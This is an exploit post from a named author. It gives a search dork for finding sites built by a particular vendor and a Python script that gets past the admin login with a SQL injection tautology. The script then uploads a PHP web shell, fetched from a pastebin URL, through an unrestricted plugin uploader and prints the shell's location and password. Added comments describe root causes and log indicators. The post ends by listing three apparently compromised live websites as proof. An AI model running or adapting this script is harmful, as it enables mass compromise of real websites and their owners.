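COPPERJAM COMPANY SCRIPT EXPLOIT : SQL injection login bypass in the admin panel, followed by an unrestricted PHP file upload through the cj-image-uploader plugin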

Dork in Bing or Google : intext:"created by copperjam" 

AUTO EXPLOIT :>
/////////////////////////////////////////////////////////

#!/usr/bin/python3 

# Exploit Author: B14ck_dz
# Vendor : Copperjam.com
# Tested on: Ubuntu / Windows 10
# Date: 6/02/2022

import time, argparse, requests, sys
from os import remove
from bs4 import BeautifulSoup
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style

# colorama is initialised with autoreset so each coloured print falls back to
# the default style afterwards.
init(autoreset=True)

# Banner is printed at module level, i.e. before any argument parsing happens.
print("""
Sites Created By COPPERJAM Shell Uploader\n
Written by B14ck_dz
Twitter : https://twitter.com/oussama1337
Zone-H 	: http://zone-h.org/archive/notifier=B14ck_dz
Discord : https://discord.gg/A8ptg8Dbu4\n""")

def my_args():
	"""Parse the command line and return the resulting namespace.

	The only option is the required ``-u``/``--url`` string, available on the
	returned object as ``.url``. The value is not validated here.
	"""
	cli = argparse.ArgumentParser()
	cli.add_argument(
		"-u",
		"--url",
		type=str,
		required=True,
		help="url of target",
	)
	return cli.parse_args()

# Fixed desktop-Chrome User-Agent passed to both POST requests in exploit().
# Because it imitates a common browser it is only a weak log indicator on its
# own; correlate it with the request paths rather than matching on it alone.
headers = {
	"User-Agent": (
		"Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
		"AppleWebKit/537.36 (KHTML, like Gecko) "
		"Chrome/97.0.4692.71 Safari/537.36"
	),
}

def exploit():
	"""Run the two-request chain against the site given by ``--url``.

	Request 1 posts the same SQL tautology as both login fields to
	``/admin/Login/process/``. Request 2 posts a PHP file to the
	``cj-image-uploader.php`` plugin endpoint and prints a URL built from the
	file name found in the response. Returns nothing; the failure paths call
	``sys.exit(1)``.

	Defender notes (root causes are inferred from the requests below; confirm
	them against the application's source):
	- Login: the payload only works if the form values are concatenated into
	  the SQL text. Use bound parameters / prepared statements.
	- Upload: destination folder and file extension arrive in the query
	  string. Enforce a server-side extension allowlist, fix the destination
	  on the server, require an authenticated session on the endpoint, and
	  disable script execution in upload directories.
	- Log indicators: POSTs to ``/admin/Login/process/`` whose Email/Password
	  contain quote characters; POSTs to ``cj-image-uploader.php`` carrying
	  ``extension=cGhw``; new ``.php`` files under ``/admin/data/app/``.
	"""
	try:
		
		# Normalise the base URL by dropping one trailing slash.
		url = my_args().url
		if url.endswith('/'):
			url = url[:-1]

		# Both fields carry the same quote-breaking tautology. Presumably the
		# login handler builds its query by string concatenation; verify in
		# the application code.
		login_data = {
		'Email' : "' OR ''='",
		'Password' : "' OR ''='"
		}

		with requests.Session() as s:
			login_path = f"{url}/admin/Login/process/"
			r = s.post(login_path,headers=headers,data=login_data)
		# NOTE(review): the response is never inspected, so this message is
		# printed whenever the POST does not raise. The tool's output is not
		# evidence that a given site is actually affected.
		print( Fore.GREEN + "[+] Logged in succesfully")
	
	# Any exception from argument handling or the POST lands here.
	except Exception:
		print(Fore.RED + f"[!] Make Sure You Entred URL Correctly")
		print("Example : http://target.com")
		sys.exit(1)
	
	#soup = BeautifulSoup(r.content, 'html5lib')
	#print(soup)

	#proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}


	# The file to upload is fetched at run time from a third-party paste and
	# written unverified to tmp.php in the current working directory.
	# NOTE(review): 'html.parser' is passed as the second positional argument
	# of requests.get, which is the query-parameter argument, not a parser.
	phpwebshell = requests.get("https://pastebin.com/raw/119SZL4p", 'html.parser')

	phpfile = open('tmp.php', 'w')
	phpfile.write(str(phpwebshell.text))
	phpfile.close()
	# This read handle is not closed anywhere in the function.
	files = {'file': open('tmp.php', 'rb')}

	# `s` is reused after its `with` block has exited. The query values are
	# base64: folderpath="./data/app/", pluginpath="../../plugins/data_manage_v02/",
	# extension="php". So the client, not the server, names the target
	# directory and the stored extension.
	r = s.post(f"{url}/admin/plugins/data_manage_v02/php/cj-image-uploader.php?folderpath=Li9kYXRhL2FwcC8=&pluginpath=Li4vLi4vcGx1Z2lucy9kYXRhX21hbmFnZV92MDIv&extension=cGhw&tagname=", headers=headers, files=files)

	# Only the text of the response <body> is used from here on.
	soup = BeautifulSoup(r.content, 'html5lib')
	result = [soup.body.string]

	try:
		if "php" in result[0]:
			try:
				# Slice from offset 27 up to the end of the first "php";
				# presumably this skips a fixed prefix in the uploader's
				# reply (TODO confirm against a real response).
				phpshell = result[0][27:result[0].find("php")+3]
			except:
				print(result)
		else:
			print(Fore.RED + "\nExploit Didn't Work :'(")
			sys.exit(1)

	# Bare except: it also catches the SystemExit raised by the else branch
	# above, so that path prints both failure messages before exiting.
	except : 
		print(Fore.RED + "I Didn't Find The Required Files to Exploit :'( ")
		print("You Can Try it Manualy : ")
		print(f"Admin Panel : {url}/admin/index.php")
		print(f"User: {Fore.GREEN}'OR ''='")
		print(f"Pass: {Fore.GREEN}'OR ''='")
		sys.exit(1)

	# The printed location sits under /admin/data/app/, matching the decoded
	# folderpath value; audit that directory for unexpected .php files.
	print(f"{url}/admin/data/app/{phpshell}")
	print(f"Shell Password : {Fore.RED} root")
	# Local clean-up of the temporary copy only.
	remove('tmp.php')

# Module-level call with no __main__ guard: importing this file runs the chain.
exploit()

//////////////////////////////////////////////////////////////

POC :
https://www.trimacppl.com/b14ck.php
https://sarvodayafoundation.org/admin/b14ck.php
https://housepital.in/b14ck.php

HAPPY HACKING DON'T FORGET TO JOIN MY DISCORD SERVER :)